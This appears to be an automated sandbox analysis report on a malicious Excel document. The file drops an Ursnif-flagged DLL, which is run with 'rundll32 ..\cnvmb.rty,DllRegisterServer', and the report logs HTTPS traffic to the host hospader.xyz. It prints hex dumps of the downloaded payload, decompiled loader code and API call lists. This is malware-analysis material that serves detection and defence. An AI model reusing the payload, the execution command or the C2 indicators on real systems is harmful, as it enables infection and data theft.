00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 0c c7 45 f8 4e 00 00 00 c7 45 0c fd 00 00 00 8d 45 0c 89 45 fc 8b 4d 0c 83 c1 01 8b 45 f8 99 f7 f9 89 45 f4 c7 45 10 c1 00 00 00 8b 45 10 83 c8 01 8b 4d 0c 83 c1 01 99
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$D%%%:%n9%:%]X%%%%]O%]Y%w_%]Z%Rich%PELYL[! Kdd`HX.text$ `.rdata[@@.data@.rsrc`@@.relocX@BUENEEEMEEEEM
                        Dec 23, 2020 14:48:46.964950085 CET3INData Raw: f7 f9 89 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 38 c7 45 fc 91 b0 00 00 8b 45 fc 0d fc f3 10 f9 2b 45 fc 0f af 45 fc 89 45 fc 81 7d fc d2 05 a6 f6 75 05 e9 c3 00 00 00 c7 45 ec 9a cc 00 00 8b 4d ec 3b 4d ec 75 62 c7 45 e0
                        Data Ascii: E]U8EE+EEE}uEM;MubEtU#UUE+EEQMMMUEEE?EEEMEEE%EUUUUEEMUUElEEEM#E
                        Dec 23, 2020 14:48:46.964977980 CET4INData Raw: 45 f0 99 f7 f9 89 45 08 eb b6 eb 9c 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 81 ec a4 00 00 00 c7 45 84 f5 00 00 00 c7 45 e4 d1 ed 67 f0 8d 45 84 89 45 d0 8d 4d e4 89 4d b4 8b 4d e4 83 c1 01 8b 55 d0 8b 02 99 f7 f9 03 45 84 89 45 84 c7 85
                        Data Ascii: EE]UEEgEEMMMUEExEPMxxx````}xPxQu| |RdhEJyJEE
                        Dec 23, 2020 14:48:46.965006113 CET6INData Raw: 03 55 98 89 55 98 c7 45 a4 a9 fa c4 f5 8d 45 a4 89 45 9c 8b 4d 9c 8b 55 a0 03 11 03 55 bc 89 55 bc 8d 45 b4 89 45 a8 8b 4d a8 8b 11 2b 55 b4 0f af 55 bc 89 55 bc 8b 45 e4 8b 48 1c 03 4d f8 0f b7 55 c0 8b 04 91 03 45 f8 eb 07 e9 cc fe ff ff 33 c0
                        Data Ascii: UUEEEMUUUEEM+UUUEHMUE3]UE=EMEEUUUUEEMMUEMM]U$E&EEE}|@MMMMUUE
                        Dec 23, 2020 14:48:46.965032101 CET7INData Raw: eb 09 8b 45 80 83 c0 01 89 45 80 83 7d 80 0a 7d 12 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 38 d1 01 10 eb df 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 34 d0 01 10 c7 45 90 d9 00 00 00 c7 45 9c 9a 73 00 00 8d 4d 9c 89 4d c0 8b 55 c0 8b 45 90 2b 02 0f af 45
                        Data Ascii: EE}}jjjjj8jjjjj4EEsMMUE+EEMMU+UE}y*t8,t||txEEEMMU#EMUUjjjjjj0EOEEM#UUU
                        Dec 23, 2020 14:48:46.965060949 CET8INData Raw: c9 51 ce 00 00 0f af 8d 3c ff ff ff 89 4d e8 c7 85 08 ff ff ff 00 00 00 00 eb 0f 8b 95 08 ff ff ff 83 c2 01 89 95 08 ff ff ff 83 bd 08 ff ff ff 04 7d 25 c7 45 9c a6 00 00 00 c7 85 34 ff ff ff 63 00 00 00 8b 45 9c 0f af 85 34 ff ff ff 8b 4d b4 2b
                        Data Ascii: Q<M}%E4cE4M+Mv8(E,MEEMEEE}1E3ED#DMU+UhftYUXt#E
                        Dec 23, 2020 14:48:46.965089083 CET10INData Raw: 85 4c ff ff ff f9 00 00 00 8b 45 d4 0d 61 85 00 00 8b 8d 50 ff ff ff 83 c1 01 99 f7 f9 89 45 c4 c7 45 b8 f1 00 00 00 8b 55 ec 03 55 b8 03 95 50 ff ff ff 89 95 50 ff ff ff c7 85 6c ff ff ff 12 47 00 00 8d 85 5c ff ff ff 89 85 64 ff ff ff 8b 8d 64
                        Data Ascii: LEaPEEUUPPlG\ddlhEdHT[ETHpx,Ex+MU+UEEEhhE#5EMET+
                        Dec 23, 2020 14:48:46.965116024 CET11INData Raw: 45 98 10 00 00 00 8b 4d 98 83 c1 01 8b 45 e4 99 f7 f9 0f af 85 60 ff ff ff 89 85 60 ff ff ff c7 85 18 ff ff ff 00 00 00 00 eb 0f 8b 95 18 ff ff ff 83 c2 01 89 95 18 ff ff ff 83 bd 18 ff ff ff 01 7d 28 c7 45 f4 56 00 00 00 8d 45 94 89 85 10 ff ff
                        Data Ascii: EME``}(EVEMM+E+EHE|}hhh-%EwE;EHPx+HE
                        Dec 23, 2020 14:48:46.965143919 CET13INData Raw: 4d a8 c7 85 0c ff ff ff 00 ac 00 00 c7 45 c8 a0 68 22 f7 8b 4d c8 83 c1 01 8b 85 0c ff ff ff 99 f7 f9 8b 55 b4 2b d0 89 55 b4 e9 76 ff ff ff c7 85 44 ff ff ff b8 27 00 00 8b 85 48 ff ff ff 23 45 c0 0f af 85 44 ff ff ff 89 45 b8 c7 45 a0 7a 00 00
                        Data Ascii: MEh"MU+UvD'H#EDEEzthMtTTEEsE;EuYdOEd%/2MTTEX
                        Dec 23, 2020 14:48:46.965173960 CET14INData Raw: c1 01 8b 95 80 fe ff ff 8b 02 99 f7 f9 0f af 85 4c ff ff ff 89 85 4c ff ff ff eb b2 8d 45 ac 89 45 98 8b 4d 98 8b 11 2b 95 7c ff ff ff 03 55 a0 89 55 a0 8b 8d 44 ff ff ff 83 c1 01 8b 85 50 ff ff ff 99 f7 f9 03 45 a0 89 45 a0 c7 85 5c ff ff ff f2
                        Data Ascii: LLEEM+|UUDPEE\\UL+LEEsRM``EM+MUUEMU+Uxxxx}M+thhh
                        Dec 23, 2020 14:48:47.008445024 CET16INData Raw: e6 c7 85 48 ff ff ff 1d 00 00 00 81 bd 48 ff ff ff 5f 0a 18 f4 7c 5d c7 85 f8 fe ff ff b8 00 00 00 8d 45 f8 89 85 f0 fe ff ff 8b 8d f0 fe ff ff 8b 95 f8 fe ff ff 2b 11 0f af 95 48 ff ff ff 89 95 48 ff ff ff c7 85 2c ff ff ff 03 c0 00 00 81 bd 2c
                        Data Ascii: HH_|]E+HH,,uppEE9}EUBU+UUUttE3tllUU


                        HTTPS Packets

                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                        Dec 23, 2020 14:51:11.803244114 CET45.142.212.128443192.168.2.2249168CN=hospader.xyz CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 10 14:52:46 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 10 14:52:46 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                        Dec 23, 2020 14:51:11.829549074 CET45.142.212.128443192.168.2.2249169CN=hospader.xyz CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 10 14:52:46 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 10 14:52:46 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                        Dec 23, 2020 14:51:18.012993097 CET45.142.212.128443192.168.2.2249176CN=hospader.xyz CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 10 14:52:46 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 10 14:52:46 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:14:48:39
                        Start date:23/12/2020
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Imagebase:0x13f3c0000
                        File size:27641504 bytes
                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:14:48:43
                        Start date:23/12/2020
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\cnvmb.rty,DllRegisterServer
                        Imagebase:0xff350000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:14:48:43
                        Start date:23/12/2020
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32 ..\cnvmb.rty,DllRegisterServer
                        Imagebase:0x2c0000
                        File size:44544 bytes
                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:moderate

                        General

                        Start time:14:51:04
                        Start date:23/12/2020
                        Path:C:\Program Files\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                        Imagebase:0x13f880000
                        File size:814288 bytes
                        MD5 hash:4EB098135821348270F27157F7A84E65
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:14:51:04
                        Start date:23/12/2020
                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2
                        Imagebase:0x12a0000
                        File size:815304 bytes
                        MD5 hash:8A590F790A98F3D77399BE457E01386A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:14:51:12
                        Start date:23/12/2020
                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2
                        Imagebase:0x12a0000
                        File size:815304 bytes
                        MD5 hash:8A590F790A98F3D77399BE457E01386A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Disassembly

                        Code Analysis

                        Call Graph

                        Graph

                        • Entrypoint
                        • Decryption Function
                        • Executed
                        • Not Executed
                        • Show Help
                        callgraph 1 Error: Graph is empty

                        Module: \x041b\x0438\x0441\x04422

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "\x041b\x0438\x0441\x04422"

                        2

                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Reset < >

                          Executed Functions

                          APIs
                          • CreateMutexW.KERNELBASE(001AE1E0,00000001,00000000), ref: 001AA091
                          • GetLastError.KERNEL32 ref: 001AA09E
                          • CloseHandle.KERNEL32(?), ref: 001AA0B1
                          • GetLastError.KERNEL32 ref: 001AA0BC
                          • GetVersionExA.KERNEL32(?), ref: 001AA0D8
                          • GetModuleHandleA.KERNEL32(?), ref: 001AA104
                          • RtlImageNtHeader.NTDLL(00000000), ref: 001AA10F
                          • CloseHandle.KERNEL32(?), ref: 001AA1E0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Handle$CloseErrorLast$CreateHeaderImageModuleMutexVersion
                          • String ID:
                          • API String ID: 3532106295-0
                          • Opcode ID: fc4fc627ea119dca23bcea000a092d8f98a7e92c32185ecc96b803d1dd6b0d8c
                          • Instruction ID: f067f9c5a357e3ff6e1c0410dedd062f3eb697f6928744644307a46fd7d49a41
                          • Opcode Fuzzy Hash: fc4fc627ea119dca23bcea000a092d8f98a7e92c32185ecc96b803d1dd6b0d8c
                          • Instruction Fuzzy Hash: 2541D339800628EFCB22AFA8DC45AAD7BA5BF56310F550522F815E7261D7348C46CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A7FAD: memset.NTDLL ref: 001A7FE4
                            • Part of subcall function 001A7FAD: RtlInitializeCriticalSection.NTDLL(001AE208), ref: 001A7FF5
                            • Part of subcall function 001A7FAD: GetCurrentProcessId.KERNEL32(?,?,?,00000110,?,?,?,?,?,?,?,001A1767), ref: 001A8064
                            • Part of subcall function 001A7FAD: OpenProcess.KERNEL32(?,00000000,00000000,?,?,?,00000110,?,?,?,?,?,?,?,001A1767), ref: 001A807B
                          • CloseHandle.KERNEL32(00000000), ref: 001A191B
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • memcpy.NTDLL(00000000,?,0000007C,0000007C), ref: 001A17A1
                          • memcpy.NTDLL(00000000,?,00000040,00000040,0000007C), ref: 001A17C8
                          • lstrcatW.KERNEL32(00000000,00000000), ref: 001A186A
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 001A188C
                          • NtQueryInformationProcess.NTDLL(000000FF,0000001A,?,00000004,?), ref: 001A18E8
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Process$memcpy$AllocateCloseCreateCriticalCurrentEventHandleHeapInformationInitializeOpenQuerySectionlstrcatmemset
                          • String ID:
                          • API String ID: 3692649901-0
                          • Opcode ID: f4579be4a48a45df6ace106f4061bbfd6ff1227d6e4807fe744786f819a0f23a
                          • Instruction ID: 60a0d06484d04e4d74ead75f92df7dca01b43eb7de43fa1f9d3f84948910960e
                          • Opcode Fuzzy Hash: f4579be4a48a45df6ace106f4061bbfd6ff1227d6e4807fe744786f819a0f23a
                          • Instruction Fuzzy Hash: FF51E239A00205BBEB10DBA4DC55FAA37FCFB16314F090569F901AB692D770ED81CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 001A4E02
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000,?,001A80A1,001AE1BC,?), ref: 001A4E22
                          • NtClose.NTDLL(?), ref: 001A4E6C
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000,?,001A80A1,001AE1BC,?), ref: 001A4E45
                          • memcpy.NTDLL(?,00000000,0000001C,?,001A80A1,001AE1BC,?), ref: 001A4E54
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 001A4E74
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Token$InformationQuery$AllocateCloseErrorHeapOpenProcessStatusmemcpy
                          • String ID:
                          • API String ID: 1769733842-0
                          • Opcode ID: 87e06c34707c44b27612ee704051aaf836407ce2385758e2dcad1e7a953d8960
                          • Instruction ID: e316c377954278f20d0c00a030b1a2af36749e4d18a38e82cfb6a2d45de38a76
                          • Opcode Fuzzy Hash: 87e06c34707c44b27612ee704051aaf836407ce2385758e2dcad1e7a953d8960
                          • Instruction Fuzzy Hash: 4C11A136940618FBDB129B50DC05FDE7B79EF86750F104021B901AA161D7B59E50DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E10001601(void* __eax, void* __ebx, intOrPtr* __ecx) {
                          				intOrPtr* _t30;
                          				struct HINSTANCE__* _t32;
                          				intOrPtr _t33;
                          				signed short _t34;
                          				CHAR* _t36;
                          				_Unknown_base(*)()* _t37;
                          				struct HINSTANCE__* _t39;
                          				void* _t40;
                          				short* _t42;
                          				intOrPtr _t44;
                          				short _t51;
                          				intOrPtr* _t53;
                          				signed short* _t57;
                          				void* _t59;
                          				void* _t61;
                          				signed short _t72;
                          
                          				_t40 = __ebx;
                          				_t59 = _t61 - 0x74;
                          				 *(_t59 + 0x6c) =  *(_t59 + 0x6c) & 0x00000000;
                          				_t53 = __ecx;
                          				 *((intOrPtr*)(_t59 + 0x64)) = __eax + __ecx;
                          				do {
                          					_t30 =  *((intOrPtr*)(_t53 + 0xc)) + _t40;
                          					_t42 = _t59 - 0x20;
                          					do {
                          						_t51 =  *_t30;
                          						 *_t42 = _t51;
                          						_t30 = _t30 + 1;
                          						_t42 = _t42 + 2;
                          					} while (_t51 != 0);
                          					_t32 = GetModuleHandleW(_t59 - 0x20);
                          					 *(_t59 + 0x70) = _t32;
                          					if(_t32 != 0) {
                          						L5:
                          						_t33 =  *_t53;
                          						 *(_t59 + 0x68) =  *(_t59 + 0x68) & 0x00000000;
                          						_t44 =  *((intOrPtr*)(_t53 + 0x10));
                          						if(_t33 != 0) {
                          							L7:
                          							_t57 = _t33 + _t40;
                          							_t34 =  *_t57;
                          							if(_t34 == 0) {
                          								L21:
                          								_t53 = _t53 + 0x14;
                          								if(_t53 >=  *((intOrPtr*)(_t59 + 0x64))) {
                          									L25:
                          									return  *(_t59 + 0x6c);
                          								}
                          								goto L22;
                          							}
                          							 *((intOrPtr*)(_t59 + 0x60)) = _t44 - _t57 + _t40;
                          							_t72 = _t34;
                          							L9:
                          							L9:
                          							if(_t72 < 0) {
                          								if(_t34 < _t40 || _t34 >=  *((intOrPtr*)(_t59 + 0x7c)) + _t40) {
                          									_t34 = 0;
                          									 *(_t59 + 0x68) =  *_t57 & 0x0000ffff;
                          								}
                          							} else {
                          								_t34 = _t34 + _t40;
                          							}
                          							if(_t34 == 0) {
                          								_t36 =  *(_t59 + 0x68) & 0x0000ffff;
                          							} else {
                          								_t36 = _t34 + 2;
                          							}
                          							_t37 = GetProcAddress( *(_t59 + 0x70), _t36);
                          							if(_t37 == 0) {
                          								goto L20;
                          							}
                          							 *( *((intOrPtr*)(_t59 + 0x60)) + _t57) = _t37;
                          							_t57 =  &(_t57[2]);
                          							_t34 =  *_t57;
                          							if(_t34 != 0) {
                          								goto L9;
                          							}
                          							goto L21;
                          							L20:
                          							 *(_t59 + 0x6c) = 0x7f;
                          							goto L21;
                          						}
                          						_t33 = _t44;
                          						if(_t44 == 0) {
                          							goto L21;
                          						}
                          						goto L7;
                          					}
                          					_t39 = LoadLibraryW(_t59 - 0x20); // executed
                          					 *(_t59 + 0x70) = _t39;
                          					if(_t39 == 0) {
                          						 *(_t59 + 0x6c) = 0x7e;
                          						goto L25;
                          					}
                          					goto L5;
                          					L22:
                          				} while ( *((intOrPtr*)(_t53 + 0xc)) != 0);
                          				goto L25;
                          			}



















                          0x10001601
                          0x10001602
                          0x1000160c
                          0x10001612
                          0x10001616
                          0x10001619
                          0x1000161c
                          0x1000161e
                          0x10001621
                          0x10001621
                          0x10001627
                          0x1000162a
                          0x1000162c
                          0x1000162d
                          0x10001635
                          0x1000163b
                          0x10001640
                          0x10001657
                          0x10001657
                          0x10001659
                          0x1000165d
                          0x10001662
                          0x1000166a
                          0x1000166a
                          0x1000166d
                          0x10001671
                          0x100016ca
                          0x100016ca
                          0x100016d0
                          0x100016e5
                          0x100016ee
                          0x100016ee
                          0x00000000
                          0x100016d0
                          0x10001677
                          0x1000167a
                          0x00000000
                          0x1000167c
                          0x1000167c
                          0x10001684
                          0x10001692
                          0x10001694
                          0x10001694
                          0x1000167e
                          0x1000167e
                          0x1000167e
                          0x10001699
                          0x100016a0
                          0x1000169b
                          0x1000169b
                          0x1000169b
                          0x100016a8
                          0x100016b0
                          0x00000000
                          0x00000000
                          0x100016b5
                          0x100016b8
                          0x100016bb
                          0x100016bf
                          0x00000000
                          0x00000000
                          0x00000000
                          0x100016c3
                          0x100016c3
                          0x00000000
                          0x100016c3
                          0x10001664
                          0x10001668
                          0x00000000
                          0x00000000
                          0x00000000
                          0x10001668
                          0x10001646
                          0x1000164c
                          0x10001651
                          0x100016de
                          0x00000000
                          0x100016de
                          0x00000000
                          0x100016d2
                          0x100016d2
                          0x00000000

                          APIs
                          • GetModuleHandleW.KERNEL32(?), ref: 10001635
                          • LoadLibraryW.KERNEL32(?), ref: 10001646
                          • GetProcAddress.KERNEL32(?,?), ref: 100016A8
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: ced49db2b31cbdbafdeee562bf01853218e7039e79a41b8ec9ff84609e86df8d
                          • Instruction ID: 103ea4b2d4c81f6642eb84806c4f8101415020032aa9c6bea0dc31b8ef57ec1e
                          • Opcode Fuzzy Hash: ced49db2b31cbdbafdeee562bf01853218e7039e79a41b8ec9ff84609e86df8d
                          • Instruction Fuzzy Hash: 45318B76A0034A8BEB24CF69CCA4AEA77E8FF052D8F19412DE855C7214E736D808CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00000001,00000001), ref: 001AAF00
                          • SetWaitableTimer.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 001AAF1E
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Time$FileSystemTimerWaitable
                          • String ID:
                          • API String ID: 3738075583-0
                          • Opcode ID: 39a4a7f810d3f2c8bf15146de714d16fe15487ef812492d59f962fd8d346eeaf
                          • Instruction ID: 74b6c94f2eda7ff5c0c46ed2d22ced0a14d0e974642803d325a3f35f3b5a59bd
                          • Opcode Fuzzy Hash: 39a4a7f810d3f2c8bf15146de714d16fe15487ef812492d59f962fd8d346eeaf
                          • Instruction Fuzzy Hash: 9EE0B6B5900208BFDB00DFA8ED44DAFB7FCEB04204B008466F956D2511E734AA558BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetUserNameW.ADVAPI32(00000000,00000000,?,?), ref: 001A2160
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: AllocateHeapNameUser
                          • String ID:
                          • API String ID: 2968006617-0
                          • Opcode ID: 85e48a198fe15b7b92fc144f424523834e07cafbc627a5ff1fc38b86ff00fda0
                          • Instruction ID: 0b70c68b980f648e708d470f4247ee86534d9b32027ac70cd33fa5a420cc3327
                          • Opcode Fuzzy Hash: 85e48a198fe15b7b92fc144f424523834e07cafbc627a5ff1fc38b86ff00fda0
                          • Instruction Fuzzy Hash: 80310AB6A00609AFDB14EFA9CD81EAEB3FCAF55300F104469E915D7241E770EA048B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • CoCreateInstance.OLE32(?,00000000,00000004,0035DB98,00000008), ref: 001A3585
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: AllocateCreateHeapInstance
                          • String ID:
                          • API String ID: 2928441540-0
                          • Opcode ID: 22d1b01ee5e9d9e644ac27b5d219cd83386c2ee542c5a07c389d2eff5385bd5d
                          • Instruction ID: d3052bbd896a205b6c979b278739353a38fceeb7e3c3cc2c89bcbc119d5ade23
                          • Opcode Fuzzy Hash: 22d1b01ee5e9d9e644ac27b5d219cd83386c2ee542c5a07c389d2eff5385bd5d
                          • Instruction Fuzzy Hash: 48213D79200701AFD700DF98C889F56B7B8FF9A714F24856CF6158B261CB71E945CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420024963.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: GetProcAddress$LoadLibraryA$VirtualAlloc$VirtualFree$VirtualProtect
                          • API String ID: 0-2397766931
                          • Opcode ID: 2e419ef47cebdb864d0ead91467e5a21daf6816e8da1f97b6fdaf40829a5c00f
                          • Instruction ID: c417e843a7d05681d4bd44d5c9f87d0922be227ca71ee3f873f6e048bab5f076
                          • Opcode Fuzzy Hash: 2e419ef47cebdb864d0ead91467e5a21daf6816e8da1f97b6fdaf40829a5c00f
                          • Instruction Fuzzy Hash: DA023E74E0429CDFDB55CBA8C884BDEBBB1BF59304F148088D5896B342C7769A89CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 001A7E1F
                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?,?,?,001AA960,00000000,001A8928), ref: 001A7E40
                          • ObjectStublessClient10.OLE32(?,?), ref: 001A7EEA
                          • StrStrIW.SHLWAPI(00000000,?), ref: 001A7F09
                            • Part of subcall function 001AB201: Sleep.KERNELBASE(000001F4), ref: 001AB224
                          • SysFreeString.OLEAUT32(00000000), ref: 001A7F29
                            • Part of subcall function 001A7CDC: ObjectStublessClient9.OLE32(?,00000000,?,00000000,?,001A7F3F,00000000,00000008), ref: 001A7CF2
                            • Part of subcall function 001A7CDC: Sleep.KERNEL32(000001F4), ref: 001A7D0A
                            • Part of subcall function 001A7CDC: lstrlenW.KERNEL32(?), ref: 001A7D40
                            • Part of subcall function 001A7CDC: memcpy.NTDLL(00000000,?,?,?), ref: 001A7D61
                            • Part of subcall function 001A7CDC: SysFreeString.OLEAUT32(?), ref: 001A7D75
                          • SafeArrayDestroy.OLEAUT32(?), ref: 001A7F82
                          • SysFreeString.OLEAUT32(00000000), ref: 001A7F90
                          • SysFreeString.OLEAUT32(00000008), ref: 001A7F9E
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: FreeString$ArrayObjectSafeSleepStublessmemcpy$Client10Client9CreateDestroylstrlen
                          • String ID:
                          • API String ID: 4161064297-0
                          • Opcode ID: 0d53fc6f3788f391e371ef66a6526c38871e30146e6448e51dd7fa490513cb31
                          • Instruction ID: e20bc9391ed9840e34823acc9597139487487265c04acba4ec9f98c55cdaecf3
                          • Opcode Fuzzy Hash: 0d53fc6f3788f391e371ef66a6526c38871e30146e6448e51dd7fa490513cb31
                          • Instruction Fuzzy Hash: 5A617A39900619EFCB01DFA8DC84AAEB7B5FF49700F144569F815EB260E7319E41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001A8187
                          • memcpy.NTDLL(?,?,00000008,00000018,00000000,?,?), ref: 001A81F4
                          • StrToIntExA.SHLWAPI(?,00000001,001A641D), ref: 001A8206
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001A8266
                          • CloseHandle.KERNEL32(?), ref: 001A8281
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,001A641D,?,?,?), ref: 001A8289
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: CloseCreateErrorHandleLastMultipleObjectsTimerWaitWaitablememcpy
                          • String ID:
                          • API String ID: 859393032-0
                          • Opcode ID: 91492e52fefef984ff8b7297fd5d48531a829797469a2d41c019ae219d59995a
